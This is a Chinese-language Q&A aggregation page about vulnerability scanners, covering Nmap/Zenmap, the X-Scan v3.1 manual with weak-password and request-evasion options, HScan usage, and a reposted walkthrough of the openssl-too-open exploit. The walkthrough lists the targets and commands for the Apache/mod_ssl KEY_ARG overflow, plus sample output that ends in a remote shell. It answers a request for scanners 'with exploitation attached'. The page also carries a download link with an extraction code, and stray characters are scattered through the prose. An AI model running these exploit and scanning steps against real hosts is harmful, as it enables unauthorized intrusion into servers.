可以使用Nmap和Zenmap這類工具來掃描軟體的漏洞,Nmap是一款網路發現和安全審計工具,它可以掃描網路中的主機,檢測開放的埠,查看網路中的服務,以及探測網路中的漏洞。Zenmap是Nmap的圖形界面,它可以方便的幫助用配檔戶進行漏洞掃描,以及查看掃描結果。另外,Nessus也是一款專業的漏洞掃描工具,它可蠢唯以幫助用戶快速的發帶賣培現軟體的漏洞,從而提高軟體的安全性。
② 哪位大神有Zenmap(埠漏洞掃描工具) V7.92 綠色中文版軟體百度雲資源
鏈接:
提世簡取碼:k7y8
軟體名稱:Zenmap(埠漏洞掃描工具)V7.92綠色中文版
語言:簡體中文
大小:27.30MB
類別:系統工具
介紹:Zenmap綠色中文版是一款優秀的埠漏洞掃描工具,Zenmap能夠塵族幫助用戶檢查主機上的埠情況,並且Zenmap可以檢測相應的埠的軟體,而且Zenmap操控的方法非常派返弊簡單,有需要的朋友快來下載吧。
③ 誰知道掃描軟體:xscan 是什麼
X-Scan V3.0 beta4
簡介:
焦點出的掃描器,國內最優秀的安全掃描軟體之一,採用了多線程方式對指定IP地址段(或單機)進行安全漏洞檢測,支持插件功能,提供了圖形界面和命令行兩種操作方式,掃描內容包括:遠程服務類搏旁型、操作系統類型及版本,各種弱口令漏洞、後門、應用服務漏洞、網路設備漏洞、拒絕服務漏洞等二十幾個大類,支持在線升級了。
你可以去 安全焦點 下載最新版本
更詳細說明
X-Scan-v3.1 使用說明
一. 系統要求:Windows NT4/2000/XP/2003
二. 功能簡介:
採用多線程方式對指定IP地址段(或單機)進行安全漏洞檢測,支持插件功能,提供了圖形界面和命令行兩種操作方式,掃描內容包括:遠程服務類型、操作系統類型及版本,各種弱口令漏洞、後門、應用服務漏洞、網路設備漏洞、拒絕服務漏洞等二十幾個大類。對於攜銀檔多數已知漏洞,我們給出了相應的漏洞描述、解決方案及詳細描述鏈接,其它漏洞資料正在進一步整理完善中,您也可以通過本站的「安全文摘」和「安全漏洞」欄目查閱相關說明。
3.0版本提供了簡單的插件開發包,便於有編程基礎的朋友自己編寫或將其他調試通過的代碼修改為X-Scan插件。另外Nessus攻擊腳本的翻譯工作已經開始,歡迎所有對網路安全感興趣的朋友參與。需要「Nessus攻擊腳本引擎」源代碼、X-Scan插件SDK、示例插件源代碼或願意參與腳本翻譯工作的朋友,可通過本站「X-Scan」項目鏈接獲取詳細資料:「http://www.xfocus.net/projects/X-Scan/index.html」。
三. 所需文件:
xscan_gui.exe -- X-Scan圖形界面主程序
xscan.exe -- X-Scan命令行主程序
checkhost.exe -- 插件調度主程序
update.exe -- 在線升級主程序
*.dll -- 主程序所需動態鏈接庫
使用說明.txt -- X-Scan使用說明
/dat/language.ini -- 多語言配置文件,可通過設置「LANGUAGE\SELECTED」項進行語言切換
/dat/language.* -- 多語言數據文件
/dat/config.ini -- 用戶配置文件,用於保存待檢測埠列表、CGI漏洞檢測的相關設置及所有字典文件名稱(含相對路辯亂徑)
/dat/config.bak -- 備份配置文件,用於恢復原始設置
/dat/cgi.lst -- CGI漏洞列表
/dat/iis_code.ini -- IIS編碼漏洞列表
/dat/port.ini -- 用於保存已知埠的對應服務名稱
/dat/*_user.dic -- 用戶名字典文件,用於檢測弱口令用戶
/dat/*_pass.dic -- 密碼字典,用於檢測弱口令用戶
/dat/p0f*.fp -- 識別遠程主機操作系統所需的操作系統特徵碼配置文件(被動識別)
/dat/nmap-os-fingerprints -- 識別遠程主機操作系統所需的操作系統特徵碼配置文件(主動識別)
/dat/wry.dll -- 「IP-地理位置」地址查詢資料庫文件
/dat/*.nsl -- 經過整理的NASL腳本列表
/plugins -- 用於存放所有插件(後綴名為.xpn)
/scripts -- 用於存放所有NASL腳本(後綴名為.nasl)
/scripts/desc -- 用於存放所有NASL腳本多語言描述(後綴名為.desc)
註:xscan_gui.exe與xscan.exe共用所有插件及數據文件,但二者之間沒有任何依賴關系,均可獨立運行。
四. 准備工作:
X-Scan是完全免費軟體,無需注冊,無需安裝(解壓縮即可運行,自動檢查並安裝WinPCap驅動程序)。
五. 圖形界面設置項說明:
「基本設置」頁:
「指定IP范圍」 - 可以輸入獨立IP地址或域名,也可輸入以「-」和「,」分隔的IP范圍,如「192.168.0.1-192.168.0.20,192.168.1.10-192.168.1.254」。
「從文件中獲取主機列表」 - 選中該復選框將從文件中讀取待檢測主機地址,文件格式應為純文本,每一行可包含獨立IP或域名,也可包含以「-」和「,」分隔的IP范圍。
「報告文件」 - 掃描結束後生成的報告文件名,保存在LOG目錄下。
「報告文件類型」 - 目前支持TXT和HTML兩種格式
「掃描完成後自動生成並顯示報告」 - 如標題所述
「保存主機列表」 - 選中該復選框後,掃描過程中檢測到存活狀態主機將自動記錄到列表文件中。
「列表文件」 - 用於保存主機列表的文件名,保存在LOG目錄下。
「高級設置」頁:
「最大並發線程數量」 - 掃描過程中最多可以啟動的掃描線程數量
「最大並發主機數量」 - 可以同時檢測的主機數量。每掃描一個主機將啟動一個CheckHost進程。
「顯示詳細進度」 - 將在主界面普通信息欄中顯示詳細的掃描過程
「跳過沒有響應的主機」 - 如果X-Scan運行於NT4.0系統,只能通過ICMP Ping方式對目標主機進行檢測,而在WIN2K以上版本的Windows系統下,若具備管理員許可權則通過TCP Ping的方式進行存活性檢測。
「跳過沒有檢測到開放埠的主機」 - 若在用戶指定的TCP埠范圍內沒有發現開放埠,將跳過對該主機的後續檢測。
「無條件掃描」 - 如標題所述
「埠相關設置」頁:
「待檢測埠」 - 輸入以「-」和「,」分隔的TCP埠范圍
「檢測方式」 - 目前支持TCP完全連接和SYN半開掃描兩種方式
「根據響應識別服務」 - 根據埠返回的信息智能判斷該埠對應的服務
「主動識別操作系統類型」 - 埠掃描結束後採用NMAP的方法由TCP/IP堆棧指紋識別目標操作系統
「預設知名服務埠」 - 如標題所述
「SNMP相關設置」頁:
全部如標題所述
「NETBIOS相關設置」頁:
全部如標題所述
「NASL相關設置」頁:
「攻擊腳本列表」 - 由於目前Scripts目錄中的腳本數量已超過3000個,在批量掃描中可以通過定製腳本列表,只選取高風險級別漏洞進行檢測,以加快掃描速度。
「全選」 - 若需要選擇所有NASL腳本,應選中該復選框。
「選擇腳本」 - 打開腳本選擇窗口,通過風險級別、檢測手段、漏洞類型等分類方式定製腳本列表
「腳本運行超時(秒)」 - 設置一個腳本可運行的最長時間,超時後將被強行終止
「網路讀取超時(秒)」 - 設置TCP連接每次讀取數據的最長時間,超時數據將被忽略
「跳過針對主機的破壞性腳本」 - 如標題所述
「檢測腳本間的依賴關系」 - NASL腳本間相互是有關聯的,比如一個腳本先獲取服務的版本,另一個腳本再根據服務版本進行其他檢測。如果打亂了腳本的執行順序可能會影響掃描結果,但也由於腳本間不需要互相等待,會節省掃描時間。
「順序執行針對服務的破壞性腳本」 - 如果一個腳本正在嘗試D.O.S某個服務,另一個腳本同時在獲取該服務信息,或同時有其他腳本嘗試溢出該服務,將導致掃描結果不正確。但如果腳本間不需要互相等待,將會節省掃描時間。
「網路設置」頁:
「網路適配器」 - 選擇適當的網路適配器以便WinPCap驅動過濾相應的數據報,否則可能會漏報由WinPCap驅動接收數據的NASL腳本檢測結果,也會影響採用NMAP的方法識別目標操作系統的結果。對於撥號用戶,應當選擇「\Device\Packet_NdisWanIp」。
「CGI相關設置」頁:
「CGI編碼方案」 - 全部如標題所述
「字典文件設置」頁:
設置各服務對應的密碼字典文件
六. 命令行方式運行參數說明:
1.命令格式: xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項]
xscan -file <主機列表文件名> <檢測項目> [其他選項]
其中<檢測項目> 含義如下:
-active : 檢測目標主機是否存活
-os : 檢測遠程操作系統類型(通過NETBIOS和SNMP協議)
-port : 檢測常用服務的埠狀態
-ftp : 檢測FTP弱口令
-pub : 檢測FTP服務匿名用戶寫許可權
-pop3 : 檢測POP3-Server弱口令
-smtp : 檢測SMTP-Server漏洞
-sql : 檢測SQL-Server弱口令
-smb : 檢測NT-Server弱口令
-iis : 檢測IIS編碼/解碼漏洞
-cgi : 檢測CGI漏洞
-nasl : 載入Nessus攻擊腳本
-all : 檢測以上所有項目
[其他選項] 含義如下:
-i <適配器編號>: 設置網路適配器, <適配器編號>可通過"-l"參數獲取
-l: 顯示所有網路適配器
-v: 顯示詳細掃描進度
-p: 跳過沒有響應的主機
-o: 跳過沒有檢測到開放埠的主機
-t <並發線程數量[,並發主機數量]>: 指定最大並發線程數量和並發主機數量, 默認數量為100,10
-log <文件名>: 指定掃描報告文件名, TXT或HTML後綴
* cgi及iis參數中「編碼方案」含義:
1.用「HEAD」替換「GET」
2.用「POST」替換「GET」
3.用「GET / HTTP/1.0\r\nHeader:」 替換 「GET」
4.用「GET /[filename]?param=」 替換 「GET」(可通過\dat\config.ini文件的「CGI-ENCODE\encode4_index_file」項設置[filename])
5.用「GET %00 」 替換 「GET」
6.多個「/」或「\」
7.「/」與「\」互換
8.用「<Tab>」替換「<空格>」
註:各變形方案若不沖突則可以同時使用,如「-cgi 1,6,8」表示同時使用第1、6、8號方案對HTTP請求進行變形。
2.示例:
xscan -host xxx.xxx.1.1-xxx.xxx.255.255 -all -active -p
含義:檢測xxx.xxx.1.1-xxx.xxx.255.255網段內主機的所有漏洞,跳過無響應的主機;
xscan -host xxx.xxx.1.1-xxx.xxx.255.255 -port -smb -t 150 -o
含義:檢測xxx.xxx.1.1-xxx.xxx.255.255網段內主機的標准埠狀態,NT弱口令用戶,最大並發線程數量為150,跳過沒有檢測到開放埠的主機;
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o
含義:檢測「hostlist.txt」文件中列出的所有主機的標准埠狀態,CGI漏洞,最大並發線程數量為200,同一時刻最多檢測5台主機,顯示詳細檢測進度,跳過沒有檢測到開放埠的主機;
七. 常見問題解答:
Q:如果沒有安裝WinPCap驅動程序是否能正常使用X-Scan進行掃描?
A:如果系統未安裝WinPCap驅動,X-Scan啟動後會自動安裝WinPCap 2.3;如果系統已經安裝了WinPCap更高版本,X-Scan則使用已有版本。「WinPCap 3.1 beta」中存在BUG,可能導致X-Scan掃描進程異常,建議使用「WinPCap 2.3」。
Q:掃描一個子網,進程里同時出現10個checkhost.exe的進程是什麼原因?
A:檢測每個主機都會單獨起一個Checkhost.exe進程,檢測完畢會自動退出。並發主機數量可以通過圖形界面的設置窗口設定,命令行程序通過「-t」參數設定。
Q:掃描過程中機器突然藍屏重啟是什麼原因?
A:掃描過程中系統藍屏是有可能的,AtGuard、天網等防火牆的驅動程序在處理特殊包的時候有可能出錯導致系統崩潰,另外很多防火牆驅動與WinPCap驅動本身也存在沖突,建議先禁止或卸載防火牆程序再試試。
Q:操作系統識別不正確是什麼原因?
A:操作系統識別方面確實不能保證100%的准確率,目前是綜合NMAP、P0F的指紋庫、NETBIOS信息和SNMP信息進行識別,如果目標機器沒有開放NETBIOS和SNMP協議,TCP/IP堆棧指紋也不在資料庫中,就需要使用者根據其他信息綜合分析了。
Q:為什麼在一次掃描中我選擇了「SYN」方式進行埠掃描,但X-Scan實際採用的是「TCP」方式,而且也沒有被動識別出目標操作系統?
A:埠掃描中的「SYN」方式和被動主機操作系統識別功能在NT4系統下無法使用,在windows 2000等系統下使用時必須擁有管理員許可權,否則將自動改用「TCP」方式進行埠掃描。
Q:新版本是否兼容2.3版本的插件?
A:X-Scan 3.0的插件介面做了少量修改,不兼容2.3以前版本的插件,需要原作者做相應修改。3.0版本提供了簡單的開發庫,插件開發方面要比2.3版本輕松許多。
Q:X-Scan 3.0中「跳過沒有響應的主機」具體含義是什麼?
A:檢測存活主機是由CheckActive插件完成的。如果X-Scan運行於NT4.0系統,只能通過ICMP Ping方式對目標主機進行檢測,而在WIN2K以上版本的Windows系統下,若具備管理員許可權則通過TCP Ping的方式進行存活性檢測。
Q:我看到Scripts目錄下有很多nessus的腳本,是否可以自己從nessus的網站上下載最新的plugin,然後解壓到scripts目錄中,實現掃描最新漏洞?
A:X-Scan移植了nessus的nasl引擎,目前對應於nessus2.0.10a。所以只要是這個版本的nessus支持的腳本,都可以復制到Scripts目錄下載入,但需要在配置界面里把「NASL相關設置」頁的「攻擊腳本列表」框清空,或者通過「選擇腳本」把新腳本加入列表。
Q:X-Scan中各項弱口令插件檢測范圍都很有限,能否自己加入其他需要檢測的帳號或口令?
A:在「X-Scan」中內置的密碼字典僅為簡單示範,使用者如果希望軟體有更強的密碼猜解能力,可以自己編輯密碼字典文件。
Q:為什麼nasl腳本掃描結果中存在大量英文,將來有沒有可能會對這些英文信息進行漢化?
A:目前已有將近2000個NASL腳本,裡面的描述信息大都是英文,需要翻譯的內容可以在本站「焦點項目」中的X-Scan下看到。歡迎大家一起幫忙翻譯,通過審核後會直接加入在線升級庫供大家下載。
Q:用xscan.exe在命令行方式下進行掃描時,如何暫停或終止掃描?
A:命令行方式檢測過程中,按「[空格]」鍵可查看各線程狀態及掃描進度,按「[回車]」可暫停或繼續掃描,按「q」鍵可保存當前數據後提前退出程序,按「<ctrl+c>」強行關閉程序。
Q:位於dat目錄下的wry.dll有什麼用處?
A:wry.dll是「追捕」軟體的地址查詢資料庫,用於X-Scan中文版查詢物理地址並且得到了作者許可。在此對「追捕」軟體作者及所有為建立此資料庫作出貢獻的朋友表示感謝。由於沒有考慮和將來「追捕」資料庫的兼容問題,不能保證能正確使用以後版本的「追捕」資料庫。在「追捕」資料庫文件格式沒有改變的情況下,可以將新版本的資料庫文件「wry.dll」拷貝到dat目錄下替換舊版本文件,但建議在覆蓋前備份舊文件。
Q:X-Scan如何安裝,是否需要注冊?
A:X-Scan是完全免費軟體,無需注冊,無需安裝(解壓縮即可運行,自動安裝WinPCap驅動)。
八. 版本發布:
X-Scan v3.1 -- 發布日期:03/25/2004,修改「存活主機」插件,加入2.3版本中SNMP、NETBIOS插件,優化主程序及NASL庫。
X-Scan v3.02 -- 發布日期:03/08/2004,「WinPCap 3.1 beta」中存在BUG,可能導致CheckHost.exe異常。X-Scan中改用「WinPCap 2.3」,建議卸載「WinPCap 3.1 beta」後再使用X-Scan進行掃描。
X-Scan v3.0 -- 發布日期:03/01/2004,修正beta版本中已知BUG,對主程序及所有插件進行優化,升級NASL庫,支持2.0.10a版本以前的所有NASL腳本;提供簡單的開發包方便其他朋友共同開發插件;其他插件正在開發中。
感謝悟休、quack幫忙精選nasl腳本列表,感謝san為支持X-Scan項目編寫相關頁面程序。再次感謝安全焦點論壇上所有提供優秀思路和協助測試的朋友們。
X-Scan v3.0(beta) -- 發布日期:12/30/2003,對主程序結構進行調整,加入移植的NASL插件,支持2.0.9版本以前的所有NASL腳本;對插件介面做少量修改,方便由其他朋友共同開發插件;對遠程操作系統識別功能進行了加強,並去掉了一些可由腳本完成的插件。
感謝isno和Enfis提供優秀插件,感謝悟休、quack幫忙精選nasl腳本列表,也感謝其他提供優秀思路和協助測試的朋友。
X-Scan v2.3 -- 發布日期:09/29/2002,新增SSL插件,用於檢測SSL漏洞;升級PORT、HTTP、IIS插件;升級圖形界面並對界面風格作細微調整。
感謝ilsy提供優秀插件。
X-Scan v2.2 -- 發布日期:09/12/2002,修正PORT插件中線程同步BUG;修正RPC插件字元顯示BUG;擴充RPC漏洞資料庫;調整掃描結果索引文件風格。
感謝xundi、quack、starst搜集並整理漏洞資料庫。
X-Scan v2.1 -- 發布日期:09/08/2002,將SNMP插件掃描項目改為可選;將HTTP、IIS、RPC插件中的「漏洞描述」鏈接到xundi整理的漏洞資料庫;修正2.0以前版本中已知BUG。
X-Scan v2.0 -- 發布日期:08/07/2002,新增路由信息檢測、SNMP信息檢測插件;升級NETBIOS插件,新增遠程注冊表信息檢測;升級IIS插件,新增對IIS.ASP漏洞的檢測;對插件介面做細微修改;更新圖形界面,新增「在線升級」功能;擴充CGI漏洞資料庫;修正1.3以前版本中已知BUG。
感謝quack、starst、sinister、ilsy、santa、bingle、casper提供寶貴資料或優秀插件,感謝san、xundi、e4gle協助測試,也感謝所有來信反饋和提出建議的熱心朋友。
X-Scan v1.3 -- 發布日期:12/11/2001,修正PORT插件中關於遠程操作系統識別的BUG。
X-Scan v1.2 -- 發布日期:12/02/2001,升級HTTP、IIS插件,新增對HTTP重定向錯誤頁面識別功能;升級PORT插件,在無法創建Raw Socket時改為使用標准TCP連接方式檢測開放埠。
X-Scan v1.1 -- 發布日期:11/25/2001,將所有檢測功能移入插件,使主程序完全成為「容器」;提供多語言支持;更新圖形介面程序;修改多線程模式,所有插件共享最大線程數量,提高並發檢測速度;新增SMTP、POP3弱口令用戶檢測;新增IIS UTF-Code漏洞檢測;擴充CGI漏洞列表。
感謝xundi、quack、casper、wollf、黃承等朋友提供的寶貴資料,感謝echo、力立等朋友協助測試,再次向付出了重體力勞動的xundi和quack致謝,涕零.....
X-Scan v1.0(beta) -- 發布日期:07/12/2001,新增對遠程操作系統類型及版本識別功能;新增對遠程主機地理位置查詢功能;在「-iis」選項中,新增對IIS 「.ida/.idq」漏洞的掃描,同時更新漏洞描述;在「-port」參數中,允許指定掃描的埠范圍(通過修改「dat\config.ini」文件中的「[PORT-LIST]\port=」);在「-ntpass」參數中,允許用戶在編輯密碼字典時通過「%」通配所有用戶名;更新CGI漏洞列表,並對CGI漏洞進行分類,以便根據遠程主機系統類型掃描特定CGI漏洞,加快掃描速度。
感謝「天眼」軟體作者--watercloud提供「被動識別遠程操作系統」模塊;感謝「追捕」軟體作者--馮志宏提供「IP-地理位置」資料庫;感謝quack提供漏洞資料、程序資料、無數有價值的建議還有感情和......
X-Scanner v0.61 -- 發布日期:05/17/2001,在「-iis」選項中新增對IIS CGI文件名二次解碼漏洞的檢測。
X-Scanner v0.6 -- 發布日期:05/15/2001,新增「-iis」參數,專門用於掃描IIS伺服器的「unicode」及「remote .printer overflow」漏洞;更新漏洞描述;調整CGI掃描的超時時間,盡量避免因超時導致的「掃描未完成」情況出現;為避免「RedV」插件被惡意利用,將自動更換主頁功能改為自動向「C:\」目錄上傳包含警告信息的文本文件。
X-Scanner v0.5 -- 發布日期:04/30/2001,修改了命令行參數,使參數含義更加直觀;擴充CGI漏洞資料庫;對NT弱口令掃描功能進行擴充--允許用戶使用用戶名及密碼字典;增加插件功能,並公布插件介面。
感謝「santa」和「老鬼(colossus)」提供插件。
X-Scanner v0.42b -- 發布日期:03/07/2001,修正了「-b」選項在特定情況導致系統overflow的BUG。
X-Scanner v0.42 -- 發布日期:03/02/2001,允許用戶對SQL-SERVER帳戶進行擴充,而不局限於掃描「sa」空口令。
X-Scanner v0.41 -- 發布日期:02/19/2001,修正了以前版本中對FTP弱口令檢測的BUG;重新優化代碼,將xscan.exe與xscan98合二為一。
X-Scanner v0.4 -- 發布日期:02/15/2001,加入對SQL-SERVER默認「sa」帳戶的掃描;在充分認識了某些人的惰性之後,臨時製作了傻瓜式圖形界面(一切操作按序號點擊即可)。
X-Scanner v0.31 -- 發布日期:01/17/2001,對埠掃描方式和輸出文件的格式做了細微調整;對Unicode解碼漏洞進行了擴充;提供了for win98的版本和一個簡單的CGI列表維護工具。
X-Scanner v0.3 -- 發布日期:12/27/2000,加入線程超時限制;增加代理功能;擴充CGI漏洞資料庫,加入對Unicode解碼等漏洞的檢測及描述;修正內存泄露問題。內部測試版。
X-Scanner v0.2 -- 發布日期:12/12/2000,內部測試版。
九. 後序:
X-Scan是一個完全免費軟體,其中的漏洞資料和整體功能都存在嚴重不足,各項功能的測試受時間及環境所限也不夠全面。只有靠朋友們積極提供相關資料,或提出自己的建議及想法,才能把X-Scan做得更好。歡迎大家來信或訪問我們的站點參與交流。
感謝安全焦點和uid0小組全體成員、前DarkSun部分成員的鼎力支持,同時也因個人資質問題向大家致歉。 --glacier_at_xfocus_dot_org
_____________________________________________________________________
使用過程中如有問題、建議或發現錯誤請發郵件至:xscan_at_xfocus_dot_org
版權所有:安全焦點(http://www.xfocus.org)
④ HScan和XScan的區別是什麼啊!
X-Scan是一個完全免費漏洞掃描軟體
使用X-Scan可以快速了掃描您的計算機上面存在的安全漏洞,以及可以快速的了解安全漏洞的處理方法。橋鍵很多表面上看起來安全的問題我們都可以及時的反映出問題,方便管理人員快速的解決安全漏洞。但是,由於XSCAN本身出發點是為HACK攻擊所使用的掃描器,所以,我們在使用的同時,HACKER們也可能使用XSCAN在掃描您的伺服器和計算機。那麼,我們就要加強本地網路的安全性了。
XSCAN不能代替其他專業的伺服器或網路掃描工具,但是,對於管理員對系統的安全測試以及安全問題的發現,有很大的作用。
HScan v1.20工具 使用說明:
1.系統要求: Windows NT/2000/XP
2.軟體簡介:
多線程方式對指定IP段(指定主機),或主機列表進行檢測.GUI和命令行兩種方式.
掃描項目:
-name --- 獲取主機名;
-port --- 默認埠掃描;
-ftp --- FTP Banner,匿名用戶,弱口令賬號掃描;
-ssh --- SSH Banner掃描;
-telnet --- TELNET Banner,弱口令賬號掃描;
-smtp --- SMTP Banner,匿名用戶,弱口令賬號掃描;
-finger --- FINGER漏洞(SunOS/Solaris 用戶列表掃描);
-iis --- IIS漏洞掃描;
-cgi --- Unix/NT cgi漏洞掃描;
-pop --- POP3 Banner,弱口令賬號掃描;
-rpc --- RPC漏洞掃描;
-ipc --- Windows NT/2000用戶列表獲取,弱口令賬號掃描;
-imap --- IMAP Banner,弱口令賬號掃描;
-mssql --- MSSQL弱口令賬號掃描;
-mysql --- MYSQL Version,弱口令賬號掃描;
-cisco --- CISCO弱口令掃描;
-plugin --- PLUGIN掃描;
-all --- 檢測以上所有項目;
其它選項:
-max <maxthread,maxhost> 指定最大線程數目,並發主機數目,默認為120,40;
-time <Timed Out> 指定TCP連接超時毫秒數,默認為10000;
-sleep <sleeptime>悔消彎 指定ftp/pop/imap/telnet探測的線程開啟間隔,默認碧悶為200毫秒;
-ping 掃描主機前ping主機
⑤ 伺服器主機漏洞掃描軟體
SSS掃描之王,是俄羅斯的一個安全漏洞掃描軟體,十分強大,具體的可以網路,免注冊的
⑥ 求可以掃描ip主機漏洞的軟體,附帶漏洞利用的更好,win7的
apache_openssl漏洞的利用及許可權的提毀舉棚升
apache_openssl漏洞的利用及許可權的提升
--nightcat
轉載請保持文章完整
第一部分:獲得shell.
在packetstorm玩了一段時間,遇到有openssl-too-open.tar.gz這個exploit.
現在看看軟體包的描述:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis
這個描述說明這個exploit 是openssl v 0.9.6的key_arg的漏洞來達到溢出的目的。不過也要
注意apache/mod_ssl的版本信息。對於大多數的有這樣條件的都能溢出成功。取得一個id是
nobody shell,有些甚至是root的許可權。軟體包裡面有一個掃描器,exploit。
好象聽起來很誘人,down回來研究一下。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h
習慣性的要讀一下軟體包的答碼REAMDE文件。
nightcat@nightcat$ more README
得到一些有用的信息:
1.編譯的方法:
直接make就可以,之後纖則就可以得到openssl-too-open和openssl-scanner
2.openssl-too-open的用法:
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
/****想成功,就要看準系統類型和apache版本號
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
*****./epenssl-too-open -a 0x07 ip .就應該可以啦!
****/
3.openssl-scanner的用法:
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
./openssl-scanner -C 192.168.0.0
/****掃描一個c類的ip
*****./openssl-scanner -C 192.168.0.0
****/
4.一個實現例子:
$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <[email protected]>
Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done
192.168.0.136: Vulnerable
$ nc 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html
./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <[email protected]>
: Opening 30 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0
* Addresses don't match.
: Opening 40 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668
* Addresses don't match.
: Opening 50 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830
: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$
整個README 文件已經說的很明白了:
現在是總結一下實現的過程:
1.通過openssl-scanner來掃描一個c段的ip,找到有漏洞的主機,
2.用nc的方法查找banner得到三個目標內容:apache的版本號,openssl的版本號,操作系統版本3.在通過openssl-too-open來進行溢出得到一個shell.
⑦ 風險名稱:NMap Xmas Scan
Nmap(網路映射器)是由 Gordon Lyon 涉及,用來探測計算機網路上的主機和服務的一種安全掃描器。nmap支持四種掃描方式:SYN掃描,UDP掃描,Xmas掃描,Null掃描。Scan在英語中是掃描的意思。所以灶空這個風險是指來自IP為221.12.22.160的設備對你使用了nmap的Xmas模式掃描。雖然不是攻擊,但是這是一般黑客進歷辯滑行攻擊的預肢臘兆動作。所以最好對IP221.12.22.160作出防禦措施。
⑧ 找出一款區域網掃描軟體,要求能找出區域網內活躍的主機數及其IP和MAC,詳細介紹其使用方法。
P2P,區域網助手,都可以的